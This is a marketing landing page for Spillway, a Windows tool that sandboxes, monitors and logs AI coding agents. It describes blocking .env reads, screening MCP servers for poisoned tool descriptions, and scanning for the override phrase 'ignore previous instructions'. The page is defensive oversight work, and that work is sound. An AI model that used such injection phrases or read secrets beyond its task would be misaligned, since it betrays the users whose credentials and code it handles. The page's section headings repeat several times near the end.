Spillway — Let AI coding agents loose on code that matters

You already trust an AI agent with your codebase.
You just can't see what it's doing with it.

Every developer running Claude Code, Cursor, or Codex on real projects knows these moments:

It read my .env. I only noticed because I happened to be watching the terminal.

Agents read broadly by design. Your API keys, tokens, and client secrets are just files to them.

I only run the agent on a copy of the repo.

If you need a sandbox copy to feel safe, you're not really using the agent — you're babysitting it.

Honestly? I have no idea what it touched last session.

When something breaks two days later, there's no record to check. You debug your own agent from memory.

Not just hooks. A real sandbox, enforced by Windows itself.

Most agent-safety tools watch tool calls and hope the agent plays along. A single shell command slips right past them. Spillway layers three independent defenses — and the deepest one is the operating system.

Policy engine

Every tool call is checked against your rules in under a millisecond, before it runs. Block reads of secrets, writes to protected paths, dangerous shell patterns — including shell commands that merely mention a protected file.

> cat .env
✗ Blocked by policy: secret files

OS-enforced isolation

In strict mode, the agent runs as a dedicated, restricted Windows account with real file permissions. It's not asked to behave — it physically cannot read what you didn't grant. Any command, any tool, any trick: same locked door.

> Get-Content ..\other-project\secrets.json
✗ Access is denied. (Windows, not us)

Credential protection

Your real Claude API token never enters the sandbox. The agent holds a worthless dummy; a local proxy swaps in the real credential on the way out. Even a fully compromised agent can't steal what isn't there.

sandbox token: spillway-dummy-***
real token: never inside

Untrusted MCP servers get detonated in a throwaway VM — before they ever touch your machine.

MCP servers are packages that run with your full permissions the moment they start. Every other tool — including plain Claude Code — launches them blind just to list their tools. Spillway doesn't. Before a session starts, each server is vetted inside Windows Sandbox: a disposable virtual machine with no network, no access to your files, and nothing to steal.

Screened before launch

The server's package and version are checked against a known-bad advisory list, and its config is scanned for red flags — shell pipes, encoded blobs, credential-looking values. A known-compromised version blocks the session without ever being run.

mcp: [email protected]
✗ HIGH — known-compromised version, blocked

Detonated in a disposable VM

Servers that pass screening are launched inside Windows Sandbox — networking disabled, your project and secrets never mapped in, everything wiped on close. Their tools are listed and fingerprinted where a backdoor has nothing to reach and nowhere to report to.

sandbox: no network · no files · wiped on exit
tools/list → fingerprinted safely

Scored, then gated

Every tool description is scanned for agent-manipulation attacks — "ignore previous instructions", hidden unicode, tool-shadowing names. Findings are scored High / Medium / Low: High blocks the session; anything lower, you decide with the evidence in front of you.

tool "search_docs": description contains
⚠ hidden instruction targeting the agent

Windows Sandbox requires Windows Pro/Enterprise. Without it, Spillway degrades gracefully: static screening always runs and still blocks known-bad servers — and it tells you plainly which layer is active. Either way, at session time every MCP server is contained by the restricted sandbox account.

Then it tells you the whole story.

Blocking is half the job. After every session, Spillway turns the raw record into answers.

🧾

Complete session timeline

Every tool call, file change, shell command, and MCP call — timestamped, in order, kept locally. When something breaks later, you check the record instead of your memory.

💬

Interview your sessionNEW

Ask a finished session questions in plain English: "Why did you edit the payment module?" Spillway reopens the agent's own context so it answers about what it actually did.

🚦

Instant risk readNEW

Every session gets a verdict — Calm, Notable, or Suspicious — with plain-language reasons. A Security Spotlight surfaces exactly what was blocked, denied, or unusual.

🔒

Secrets stay secret

.env files, keys, and certificates are blocked from the agent's tools and from shell commands — and in strict mode, denied by Windows file permissions on top.

🧰

MCP supply-chain guardNEW

Untrusted MCP servers are vetted in a disposable VM and risk-scored before any session. Every approved tool is fingerprinted; if a server silently changes a definition, the session refuses to start until you review it.

⛔

Kill switch

One click terminates the agent and its entire process tree — even across the sandbox account boundary. Policies can pull it automatically ("stop the session if X happens").

📈

Drift & trends

Spillway learns each project's normal. A session that deletes 10× more files than usual, or suddenly calls unfamiliar tools, gets flagged — even if no rule was broken.

🛡️

Tamper-proof by design

The agent can't read, edit, or delete Spillway's own rules and audit trail — that protection is built in and can't be switched off by any policy.

🏠

100% local

No cloud, no account, no telemetry. The background service makes zero outbound connections. Your code and your session history never leave your machine.

Not a mockup. This is a real session.

An agent was told to explore a project. It tried to read two .env files — one inside the project, one in a different folder entirely. Here's what that looks like.

Spillway session report: two blocked .env reads, trust read marked Suspicious, tools-used breakdown and full timeline — **The session report.** Two `.env` reads blocked by policy, the session flagged *Suspicious* with plain-language reasons, every tool call counted — and the whole thing exportable as Markdown or JSON.

Spillway dashboard: daemon status, recent sessions with risk reads (Calm and Suspicious), and trend charts vs the project's average — **The dashboard.** Every recent session with its risk read at a glance — *Calm* sessions stay quiet, the *Suspicious* one shows its 2 blocks — plus trends against this project's normal activity.

Three steps. No workflow changes.

Pick a project

Open Spillway, choose the folder, and set what's off-limits. Sensible defaults (.env, keys, certs) are on from the first second.

Start a protected session

One click launches Claude Code exactly as you know it — same terminal, same speed — wrapped in Spillway's policy layer, or the full OS sandbox in strict mode.

Work, then read the story

Code as usual. When the session ends you get the timeline, the risk read, and a report — and you can ask the session itself what happened and why.

Questions developers actually ask

Does it slow Claude Code down?

No. The policy check runs in memory in under a millisecond, and the whole hook round-trip is budgeted under 100 ms per tool call. And it fails safe: if Spillway's service is ever slow or down, your agent keeps working — you lose protection, never your terminal.

Which agents does it support?

Claude Code today, end to end. Cursor, Codex, and Gemini CLI are on the roadmap — the enforcement layer (OS sandbox, credential proxy, file watcher) is agent-agnostic by design.

Windows only?

Early access is Windows 10/11. macOS is next — leave your email and tell us your platform, it directly decides what we build first.

Can the agent just turn Spillway off?

No. The agent can't touch Spillway's rules, database, or audit trail — that's blocked at the policy layer and, in strict mode, by Windows file permissions the agent's account simply doesn't have. Protection the protected thing can delete isn't protection.

What about malicious MCP servers?

This is the blind spot almost nobody covers: an MCP server is code that runs with your full permissions the instant it starts — and most tools launch it just to read its tool list. Spillway screens each untrusted server against known-bad versions first, then launches it inside a disposable Windows Sandbox VM (no network, no files) to fingerprint its tools and scan for poisoned descriptions. High-risk findings block the session; and at session time the server runs inside the restricted account anyway — so even a payload that behaved during vetting stays contained.

Do you see my code or my prompts?

We can't. There is no server side. Spillway stores event metadata (which file, which tool, when — never file contents) in a local database on your machine, with secret-pattern redaction on top.

What will it cost?

Free during early access. Paid plans will land in the range of other individual developer tools — early-access users lock in a founding discount, permanently.

All the power. None of the flood.

A spillway is how a dam survives its own power: enormous force passes through on an engineered path, and when something goes wrong, the emergency gate dumps the load before disaster. That's Spillway for your AI agent: every action flows through a channel you control — full speed while it behaves, a hard stop the instant it doesn't.

10 early-access seats per batch · Windows · free while in early access

Let AI coding agents loose on code that matters.

You already trust an AI agent with your codebase.
You just can't see what it's doing with it.

Not just hooks. A real sandbox, enforced by Windows itself.

Policy engine

OS-enforced isolation

Credential protection

Untrusted MCP servers get detonated in a throwaway VM — before they ever touch your machine.

Screened before launch

Detonated in a disposable VM

Scored, then gated

Then it tells you the whole story.

Complete session timeline

Interview your sessionNEW

Instant risk readNEW

Secrets stay secret

MCP supply-chain guardNEW

Kill switch

Drift & trends

Tamper-proof by design

100% local

Not a mockup. This is a real session.

Three steps. No workflow changes.

Pick a project

Start a protected session

Work, then read the story

Built by a developer who didn't want his code in someone else's cloud.

Questions developers actually ask

All the power. None of the flood.

You already trust an AI agent with your codebase.You just can't see what it's doing with it.

Not just hooks. A real sandbox, enforced by Windows itself.

Policy engine

OS-enforced isolation

Credential protection

Untrusted MCP servers get detonated in a throwaway VM — before they ever touch your machine.

Screened before launch

Detonated in a disposable VM

Scored, then gated

Then it tells you the whole story.

Complete session timeline

Interview your sessionNEW

Instant risk readNEW

Secrets stay secret

MCP supply-chain guardNEW

Kill switch

Drift & trends

Tamper-proof by design

100% local

Not a mockup. This is a real session.

Three steps. No workflow changes.

Pick a project

Start a protected session

Work, then read the story

Built by a developer who didn't want his code in someone else's cloud.

Questions developers actually ask

All the power. None of the flood.

You already trust an AI agent with your codebase.
You just can't see what it's doing with it.